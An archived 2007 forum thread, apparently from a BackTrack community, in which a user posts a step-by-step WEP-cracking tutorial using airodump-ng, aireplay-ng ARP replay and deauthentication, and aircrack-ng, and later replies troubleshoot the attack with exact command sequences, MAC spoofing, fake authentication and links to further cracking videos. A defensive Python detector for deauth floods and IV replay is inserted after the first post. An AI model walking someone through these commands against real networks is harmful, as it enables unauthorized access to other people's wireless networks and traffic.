
How To Crack Wep With Bt2 Final


ghost8786
03-13-2007, 05:26 PM
OK. I'M A TOTAL NEWBIE TO LINUX AND SECURITY TESTING. I HAVE SEARCHED THIS FORUM AND HAVE YET TO FIND SIMPLE INSTRUCTIONS ON HOW TO CRACK WEP. SO, THIS IS FOR THE NEWBIES OUT THERE THAT ARE JUST LIKE ME. I USED BT 2 FINAL AND DID THIS CRACK ON A FRIEND'S AP, WITH HIS CONSENT. I HAD NO PRIOR KNOWLEDGE ABOUT HIS AP OR WHETHER HIS WEP WAS 64 OR 128 BIT. HERE GOES:

OPEN UP KISMET AND FIND THE AP YOU WISH TO CRACK. HIT "S" AND THEN "C". THIS WILL SORT THE APs BY CHANNEL. USE THE ARROW KEY TO HIGHLIGHT THE AP YOU WISH TO CRACK. HIT ENTER. WRITE DOWN THE SSID, THE BSSID, AND THE CHANNEL. ALSO MAKE SURE IT HAS CLIENTS CONNECTED TO IT, OTHERWISE IT'S GOING TO BE NEXT TO IMPOSSIBLE TO OBTAIN ENOUGH IVS TO DO THE CRACK.

GO TO THE COMMAND SCREEN (CLICK THE SECOND ICON FROM THE LEFT ON THE BOTTOM LEFT SIDE OF THE SCREEN)

TYPE AIRODUMP-NG -W CAPTURE -C CHANNELNUMBER DEVICE
THE DEVICE WILL BE THE NAME OF YOUR WIRELESS CARD. YOU SHOULD SEE THE NAME ON THE COMMAND SCREEN THAT CAME UP WHEN YOU OPENED KISMET. MINE IS RA0. THE CHANNELNUMBER IS THE NUMBER OF THE CHANNEL THE AP IS ON. HIT ENTER.

ON THE SCREEN NOW YOU SHOULD SEE THE MAC ADDRESS OF THE AP YOU ARE CRACKING. SEVERAL LINES BELOW IT YOU SHOULD SEE AT LEAST 2 MAC ADDRESSES. ONE WILL BE THE AP AND THE OTHER WILL BE THE CLIENT. WRITE DOWN THE CLIENT MAC ADDRESS.

GO TO THE COMMAND SCREEN AGAIN AND TYPE AIREPLAY-NG --ARPREPLAY -B MACADDRESSOFAP -H MACADDRESSOFCLIENT DEVICE. HIT ENTER.

GO TO THE COMMAND SCREEN AGAIN AND TYPE AIREPLAY-NG -E SSIDOFNETWORK -A MACADDRESSOFAP -C MACADDRESSOFCLIENT --DEAUTH 10 DEVICE. HIT ENTER.

IF YOU LOOK ON THE AIRODUMP SCREEN YOU SHOULD SEE THE DATA NUMBERS RISING AT A FAST RATE. ON THE AIREPLAY SCREEN (THE COMMAND YOU EXECUTED BEFORE THE DEAUTH), MAKE SURE THAT AN ARP REQUEST WAS CAPTURED AND IS NOW BEING RESENT. IF IT IS, THEN YOU SHOULD HAVE THE KEY IN NO TIME. LET IT RUN FOR ABOUT 5-10 MINS. YOU CAN CLOSE THE DEAUTH SCREEN.

GO TO THE COMMAND SCREEN AND TYPE: AIRCRACK-NG -F 4 MACADDRESSOFAP -N 64 CAPTURE-01.CAP
HIT ENTER. 64 IS FOR 64 BIT AND 128 IS FOR 128 BIT. IF YOU RUN THE CRACK ON 64 AND IT DOES NOT WORK AFTER A FEW TIMES THEN TRY THE 128. THE ONE I CRACKED ENDED UP BEING 128 AND TOOK ABOUT 35 MINS TO CRACK WITH ABOUT 1.2 MILLION IVS. ONE IMPORTANT NOTE ABOUT THE CAPTURE-01.CAP FILE: ON MINE, EVEN THOUGH I NAMED IT CAPTURE, IT NAMED IT CAPTURE-01. BE SURE TO CHECK UNDER EDITOR/KWRITE TO MAKE SURE OF THE EXACT NAME OF THE FILE. IT SHOULD BE THE ONLY CAP FILE IN THERE. JUST GO TO KWRITE AND GO TO OPEN. YOU SHOULD SEE YOUR FILE IN THERE. THIS HELD ME UP FOR QUITE SOME TIME TILL I SCREWED AROUND WITH IT.

ALSO THE -F CAN BE RAISED OR LOWERED. A HIGHER NUMBER WILL TAKE LONGER AND A LOWER NUMBER WILL BE FASTER, BUT MAY NOT FIND THE KEY. I STICK WITH 4.
HOPE THIS HELPS YOU NEWBIES.
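
The deauth burst and the re-injected ARP request in the steps above are exactly the two signals a wireless IDS watches for. The following is an added example, not code from the original post or from the aircrack-ng project: a small Python detector run over a constructed list of decoded 802.11 frames. It flags a burst of deauthentication frames aimed at one client, and a sender that repeats one WEP IV hundreds of times in a short window, which is what a replayed ARP request looks like on the air (a real station picks a fresh IV per frame). The Frame record layout, the MAC addresses and the thresholds are assumptions for the example.

```python
from collections import Counter, namedtuple

# Hypothetical decoded-frame record: the fields a monitor-mode sniffer exposes
# per 802.11 frame (timestamp, subtype, transmitter, receiver, BSSID, and the
# 24-bit WEP IV as hex for encrypted data frames, else None).
Frame = namedtuple("Frame", "ts subtype src dst bssid iv")

AP = "00:11:22:aa:bb:cc"      # constructed BSSID
CLIENT = "00:11:22:dd:ee:ff"  # constructed client MAC

# Fixed counting buckets keep the example short; a burst straddling a bucket
# boundary can be split in two, so a production detector uses a sliding window.
WINDOW = 2.0           # seconds per bucket
DEAUTH_THRESHOLD = 5   # deauth frames to one client per bucket
REPLAY_THRESHOLD = 50  # same-IV data frames from one sender per bucket


def _bursts(counts, threshold):
    """Collapse {(key..., bucket): n} into {key: max n} for n >= threshold."""
    out = {}
    for key, n in counts.items():
        if n >= threshold:
            k = key[:-1]
            out[k] = max(n, out.get(k, 0))
    return out


def find_deauth_floods(frames, threshold=DEAUTH_THRESHOLD, window=WINDOW):
    """Return {(bssid, client): count} for clients hit by a burst of deauths.

    An AP legitimately sends a handful of deauths; tens per second to one
    station is the signature of injected deauthentication frames.
    """
    counts = Counter()
    for f in frames:
        if f.subtype == "deauth":
            counts[(f.bssid, f.dst, int(f.ts // window))] += 1
    return _bursts(counts, threshold)


def find_iv_replay(frames, threshold=REPLAY_THRESHOLD, window=WINDOW):
    """Return {(src, iv): count} for senders repeating one IV at a high rate.

    Re-injecting a captured frame cannot change its ciphertext, so every copy
    carries the same IV; hundreds of identical-IV data frames from one MAC in
    a couple of seconds is replay, not normal WEP traffic.
    """
    counts = Counter()
    for f in frames:
        if f.subtype == "data" and f.iv is not None:
            counts[(f.src, f.iv, int(f.ts // window))] += 1
    return _bursts(counts, threshold)


def build_sample():
    """Constructed traffic: normal data, then a deauth burst, then an ARP replay."""
    frames = [Frame(0.1 * i, "data", CLIENT, AP, AP, f"{i:06x}") for i in range(20)]
    frames += [Frame(5.0 + 0.01 * i, "deauth", AP, CLIENT, AP, None) for i in range(10)]
    frames += [Frame(6.0 + i / 300, "data", CLIENT, AP, AP, "0a0b0c") for i in range(300)]
    return frames


if __name__ == "__main__":
    sample = build_sample()
    print("deauth bursts:", find_deauth_floods(sample))  # {(AP, CLIENT): 10}
    print("replayed IVs:", find_iv_replay(sample))       # {(CLIENT, '0a0b0c'): 300}
```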

thorin
03-13-2007, 06:11 PM
Wow that's a lot of YELLING.

xtreme04
03-13-2007, 06:26 PM
Agreed, bunch of yelling and I hate reading shit in caps. Anyways, props for the tut but there are at least 4 of them out there.

croft
03-13-2007, 06:31 PM
Why go thru all that typing of commands? With airoscript you just press 1, 2, 3, or 4 to run those commands.

ghost8786
03-13-2007, 06:51 PM
sorry bout the caps guys...yeah, I have seen the other tuts on WEP cracking but most use older versions of BT and were not applicable to complete newbies...not too familiar with using airoscript, I just prefer to type the commands out, although I will make an attempt to learn to use airoscript.

thorin
03-13-2007, 07:37 PM
Sorry for burning you on the caps....please know that the contribution back to the community is appreciated even if we bust yer chops for YELLING ;)

Itssid
03-14-2007, 05:31 AM
How long should I leave aircrack working and how do I know the encryption type is 64 or 128??

How would i identify that aircrack is not working with a particular encryption type like example 64?

By the way GREAT TUT! just wish there was a video where we could watch how to crack WEP using BACK TRACK 2 FINAL.

ghost8786
03-14-2007, 01:39 PM
How long you leave aircrack running depends on how many ivs you have. I have only cracked a 128 bit key and it took about 30-45 mins with 1.2 million ivs. I believe the number for 64 bit is around 250,000-500,000. When I tried with 64 bit it ran for about 10 mins and then told me it couldn't find the key, so I changed the f factor from 4 to 10 and it took a bit longer but still told me it couldn't find it. I then ran aircrack for 128 bit and it ran for quite some time before it found the key. I left aireplay running while aircrack was running also, that way it kept the ivs rising.

mikem1983
03-15-2007, 12:17 AM
One more thing you should try is using -i 1; chances are it's the first hex key, and it will save you a lot of time if it is. In a few cases I have cracked 64bit keys with 100,000 ivs in less than a minute.

Itssid
03-15-2007, 01:17 AM
ok whenever I try to do an arpreplay attack it says the specified mac did not match the other mac or something like that and it says 0 for sent and 0 ARP requests, any ideas? OH and BTW the PWR under airodump always shows -1, even though I own RKJ and it's just upstairs in my house. My wireless card is inbuilt in an IBM thinkpad intel centrino mobile technology. Here's a picture:

Removed by me

PLEASE help me out !!

Thanks

ghost8786
03-15-2007, 04:16 AM
are you locked onto one channel? as far as the error message is concerned, I always get the same message, but it never causes any problems for me. I couldn't see the screen shot too well, but it looked like there was only one protected network, and it was WPA-PSK. Make sure the client Mac address that you are using is listed in airodump. I have gone off the client mac address from kismet and it is not always accurate for some reason.

ghost8786
03-15-2007, 04:19 AM
Ok, so I have mastered, or so I think, the art of cracking the WEP key on APs with broadcasted SSIDs and assigned channel numbers (as they appear in Kismet). What about APs without ssids or channel numbers? I know for a fact that a client is connected to the network, but it is set up not to broadcast the ssid and no channel number is listed. any suggestions?

tybalt
03-16-2007, 08:57 AM
ITssid:
From the pic you posted it doesn't even look like you have WEP enabled on the AP you're trying to attack. Also your ARP attack is set to AP 00:14:BF:CD:A5:32 and your card is associated to AP 00:13:46:F8:E0:19

Itssid
03-17-2007, 06:05 AM
tybalt:
default is not my target, then why should I enter the bssid of default? Aren't I supposed to enter the bssid and mac client I am trying to crack, and not the default I am associated with??

please help this is very confusing.

madmanu
03-17-2007, 11:17 AM
In your screenshot I am missing a deauthentication..

.. and having too much of MAC information. Blur those MACs when posting publicly unless they're fake, just in case.

Itssid
03-18-2007, 06:42 PM
Do i have to use the mac of the ap i am associated with?

soulflyfgm
09-26-2007, 06:01 PM
Which wireless card do u recommend to use bk2 to crack wep? I'm about to buy the netgear wg511u....

EnculeurDePoules
10-03-2007, 01:09 PM

erm...depends on PC or laptop, and which connection (usb, pci......)

sifuconman
10-04-2007, 09:18 AM

What is the recommended card for desktop ?

sunking
10-17-2007, 08:50 PM
Thanks for the tut. but i'm having a problem.
When i try this>> GO TO THE COMMAND SCREEN AND TYPE: AIRCRACK-NG -F 4 MACADDRESSOFAP -N 64 CAPTURE-01.CAP <<
I get 'No directory or file' error.
I'm in the /root directory and I can see 'capture-01.cap' listed when
I do ls -n
Is this because I'm using the live-cd and not a HD install?

balding_parrot
10-17-2007, 08:55 PM
Are you using all caps like that, or are you using the proper capitalisation, as it does make a huge difference.

sunking
10-17-2007, 09:04 PM
Yes I'm using correct syntax--no caps, I just did copy and paste for the reply

SLK001
10-18-2007, 11:23 PM
Just run:

aircrack-ng capture*.cap

What version of aircrack-ng are you using?

sunking
10-19-2007, 02:24 AM
AHA! I knew there was a way using wild cards '*'
Thanks..
Version?-- don't know, I'll have to check when I get home.
Using the version that comes with BT2--just installed to HD last night,
haven't updated anything yet.

wepcrack
10-26-2007, 05:16 AM
when I do an aireplay attack the speed of collected data didn't go up,

is the mac of the client after -h and -c the same?

it asked to use airodump to capture the replies, what do I need to do to capture the replies?

and when I do the aireplay attack the packet and sent packet all go up but the got arp stays at 1 or 2

deepjoy
10-26-2007, 05:12 PM
wepcrack, i think you are missing some fundamental information concerning the use of the Aircrack Suite. I suggest you go to the Aircrack site and read the information that is available.

balding_parrot
10-26-2007, 05:38 PM
You would be best to look in the tutorials and guides section of this forum where you will find videos explaining how to, even the Aircrack site uses them.

alexsys
10-28-2007, 07:50 PM
Hello everyone.
First of all, I'd like to say that I'm new to this Forum. Thanks in advance for any help received.
Here is my issue:
I have a Toshiba laptop, and just bought a Proxim 8470-wd card which has an Atheros chipset I believe.
Now, after putting the card in Monitor mode with "airmon-ng start wifi0"
I manage to launch the Airodump command on the specified channel of my wireless network (ch. 1).
Then, I start the Aireplay fake authentication using either my real MAC or a fake one. It should not make a difference, as I disabled MAC filtering. I receive an authentication successful.
However, after launching the Aireplay attack -3 using the ESSID, the AP MAC, and the fake or the real MAC on the ATH1 (which is the interface listening in monitor mode), the IVS count does not increase in particular number. It basically increases at the normal rate. It also does not receive any ARP replies, and therefore does not send any.
Now, as this is my network and no other clients are attached to it, I wonder what I'm doing wrong?
On my network I'm using WEP Encryption and Open Authentication, just to let you picture the scenario.
Please help, as I can't get IVS to increase in any way!
Thanks in advance.

deepjoy
10-28-2007, 11:11 PM
Too many questions in one thread.

pureh@te
10-28-2007, 11:37 PM
Normally I would tell you to use the search function because this topic has been exhausted to an absurd level, but lucky for you, you caught me in a good mood. With the -3 attack sometimes you must wait a long time to capture an arp request, up to an hour. You should be able to see in the aireplay window when it is captured. Your other option is to use the two other attacks, which are the -5 and -4 options in aireplay. There are easy to follow videos and tuts all over this site and the aircrack site. So there you go, still requires searching but I hope that helps:)

alexsys
10-29-2007, 12:52 AM
Thanks for your prompt reply. I very much appreciate it!
I actually read a lot in various forums, and watched an endless number of tutorials (I guess I'm dumb! lol). however, still haven't managed to get through this stage.
After upgrading to aircrack 1.0 I now somehow managed to increase the number of IVS packets to over 500.000, which for my WEP Key (40 Bytes) should be enough, right?
I then tried aircrack-ng with various options like increasing the fudge factor, the Korek options, etc... using the output.cap file without luck.
I also notice the output.cap file only shows 8 IVS in it. Why is it not increasing?
Here are the commands i run:
1: airodump-ng --ivs -c 1 -w out ath1
2: aireplay-ng -1 0 -e ESSID -b MAC of AP -h MAC of authorised client ath1<<<got association!
3: aireplay-ng -3 -e ESSID -b MAC of AP -h MAC of authorised client ath1 <<< it shows arp replies increasing to more than 500.000.
I then confirm on the airodump window the number of packets collected is increasing rapidly.
4: aircrack-ng -a 1 -e ESSID -b MAC of AP replay_arp output file .cap <<< but only shows reading 8 IVS.
Hope someone can shed light on this issue.
Thanks for your patience.
alexsys

shamanvirtuel
10-29-2007, 03:17 AM
you're not opening the right file

your file is an .ivs file not a .cap file (because of the --ivs switch)

search something called xxxxxx.ivs

cd to the dir those files are

and try aircrack-ng on this file........

alexsys
10-29-2007, 09:13 AM
Hi Shamanvirtuel, and thanks for your interest in my issue.
I tried to use aircrack-ng with the .ivs file as well, which contains more than 500.000 ivs collected over a period of 3 hours, but it fails consistently.
Now, reading from other posts, I'm aware of the fact that for a 40 bit Key, it should take no longer than 5 mins. and no more than 300.000. However at 600.000 ivs, it still fails and keeps retrying every 5.000 ivs. I also tried changing the option -n to 128 (although I know my WEP key is definitely 64), and the various Korek options, but still no luck. My Wep Key is a 10 digit Alpha-numeric value.
Thanks in advance.

-=Xploitz=-
10-29-2007, 04:24 PM
Yep. Even the aircrack guys liked them and got my permission to use them ....

http://aircrack-ng.org/doku.php?id=videos


Fragmentation attack (http://videos.aircrack-ng.org/frag-attack-atheros.swf)
Fragmentation attack with airoscript [low quality BUT explained (youtube) (http://www.youtube.com/watch?v=bQcLMDb-oug)]
Fragmentation attack with airoscript [ high quality AND explanation (stage 6) (http://stage6.divx.com/user/viperwalt/video/1387515/Fragmentation-Attack-With-Airoscript-%28LQ,-explained%29)] – best bet
Fragmentation attack with airoscript [ super high quality BUT NO explanation (stage 6) (http://stage6.divx.com/user/viperwalt/video/1387341/Fragmentation-Attack-Using-Airoscript)]
Fragmentation attack with airoscript (http://videos.aircrack-ng.org/FragmentationAttack/)
WEP cracking with airoscript (http://videos.aircrack-ng.org/WEP_Cracking_with_Airoscript.avi)
Injection with IPW2200 (http://videos.aircrack-ng.org/injection_ipw2200.swf) (with wifislax)
How to crack WEP with no client (http://video.aircrack-ng.org/noclient/)
Chopchop without clients using IPW2200 (http://mirror-wifislax.lost-away.org/videos/chopchopipw2.htm)
security-freak.net aircrack-ng usage (http://security-freak.net/tools/amit/airodump-ng/airodump-ng.html)
Volume #1 "E-Z No Client WEP Cracking Tutorial" (http://forums.remote-exploit.org/showthread.php?t=9063)
Volume #2 "E-Z No Client Korek Chopchop Attack Tutorial" (http://forums.remote-exploit.org/showthread.php?t=7872)
Volume #3 "E-Z WPA/WPA2 Cracking Tutorial" (http://forums.remote-exploit.org/showthread.php?t=8230)
Volume #4 "E-Z Cracking WPA/WPA2 With Airolib-ng Databases Tutorial" (http://forums.remote-exploit.org/showthread.php?t=8041)



Ego went up another notch. Is that possible for me?? :confused::D:p:cool:

-=Xploitz=-
10-29-2007, 07:17 PM
It doesn't matter that you made it Alpha-numeric. In the WEP Cracking process ..it's all converted into hexadecimal. (all numbers) ;)

Have you upgraded your version of aircrack to the latest version..or a developmental version?? :confused::confused:

alexsys
10-29-2007, 07:53 PM
Hello again.
Yes, I upgraded the aircrack-ng suite to Aircrack-ng 1.0 beta1 r809. Is this version ok?
Thanks for the links you guys posted, I watched them again. Although I pretty much watched over and over again most of the ones concerning WEP.
I now managed to get the WEP key of my network (in letters and numbers!!!), but only after I connected my other laptop to the network.....as soon as it connected, my ARP replies started increasing massively.
So far, even following the tutorial on "how to crack WEP with no clients" that you posted, line by line, I could not get the ARP replies to increase. I only got them after connecting to the network with another laptop. Weird, isn't it?!!!
Here are the commands i used:
airmon-ng stop ath0
ifconfig wifi0 down
macchanger --mac 00:11:22:33:44:55 wifi0
airmon-ng start wifi0
airodump-ng -w out --bssid xx:xx:xx:xx:xx -c 1 ath0
aireplay-ng -1 0 -a xx:xx:xx:xx:xx:xx -h 00:11:22:33:44:55 ath0
aireplay-ng -3 -b xx:xx:xx:xx:xx:xx -h 00:11:22:33:44:55 ath0 <<also with -x 1000 option
aircrack-ng -n 64 -b xx:xx:xx:xx:xx:xx out-01.cap
There must be something I'm missing that was not in the tutorial.........???
As soon as I manage to get the "no clients" attack working on my network, I'll switch my router to WPA and try to crack that (although I heard that with a combination of alphanumerical and special chars of 21 chars it is virtually impossible?). But I still have not managed to install the wpa_supplicant file on my BT2.....I'll have to work on that a bit harder I guess!
Meanwhile I hope somebody can shed light on what's missing in my attack commands previously described.
I would like to thank the Moderators and the other Senior Members that have helped me so far. I truly appreciated it.

-=Xploitz=-
10-29-2007, 08:38 PM
Sincerity is ALWAYS welcomed here. ;)

Your commands are PERFECT...except you need to leave off the -n option since its not 64 bit WEP...or use -n 128 .

The only explanation is that your AP isn't spitting out an ARP (Address Resolution Protocol) request fast enough for you. Be patient. With the commands you posted...SURELY it will respond in time. It depends on how lucky you are with your timing if no clients are connected. It can take seconds up to 30 minutes and rarely (but this does happen) hours!!! So just be patient..and if you're not..I got a video on the -4 korek chopchop attack that may help as well. ;)

Try other attacks...-5...-4...-2

Do they work? ;)

Not all AP's respond the same way. Some hate the -3 attack...while others love it to death. ;)

Have fun...don't be impatient. You MUST be like a sniper in this business. Guess what snipers are??

That's right...

They're PATIENT. <wink smiley here>



BTW..I have 3 or 4 tutorials concerning wpa_supplicant. They WILL get you online. Do a "search" using the keywords wpa_supplicant..or E-Z connect...and you'll find my tutorials on every encryption for WPA / WPA2 MINUS RADIUS Server.

alexsys
10-29-2007, 10:02 PM
Thanks Xploitz, I'll certainly try your tutorials on wpa!
By the way, the only reason I specified the -n 64 in the aircrack-ng command is because, the key being one I myself set up, I know it is a 40bit key.
Hopefully I'll get the wpa_supplicant file working on BT2, as I've always been a Windows "slave", and only recently met Linux and Unix.....
Glad to know there are people willing to help out when you need it. Hopefully I'll be able to contribute to the Forum in the future!

-=Xploitz=-
10-29-2007, 10:36 PM
You're welcome!! :)

Please let me know in this thread if you need further assistance..and post any questions concerning my wpa_supplicant tutorials in THAT thread. ;)

alexsys
10-29-2007, 11:53 PM
Xploitz,
I have had all my questions answered !!! Quite impressed, I have to say.
I also managed to install and configure my wpa_supplicant file (thanks to your tutorial), and now I'm up and running with WPA on my network....
Now I can move on to the other features of BT2. I'll post my questions in the appropriate Threads in the future.
You guys are just great!
Thanks again for all your support and time so far. :)

-=Xploitz=-
10-30-2007, 04:30 AM
Again, you are most welcome. :)

We aim to impress...and keep it that way. ;)

BillB0B
11-28-2007, 04:38 PM
Thanks for sharing that.

eight-1-oh-five
11-30-2007, 10:25 AM
Can't you just get the Client MAC from kismet by going into the AP you want and pressing c? because it doesn't always show up where you said.

Also, when using aircrack-ng -f 4 00:A1:22:C3:44:E5 -n 64 capture-01.cap it says:

Opening 00:A1:22:C3:44:E5
open failed: No such file or directory.

What's up with that?

franky_402
11-30-2007, 04:36 PM
Can't you just get the Client MAC from kismet by going into the AP you want and pressing c? because it doesn't always show up where you said.

Also, when using aircrack-ng -f 4 -h 00:A1:22:C3:44:E5 -n 64 capture-01.cap it says:

Opening 00:A1:22:C3:44:E5
open failed: No such file or directory.

What's up with that?

I think that's the correct letter to use but you were missing it

eight-1-oh-five
12-02-2007, 05:04 PM
What was I missing? :confused: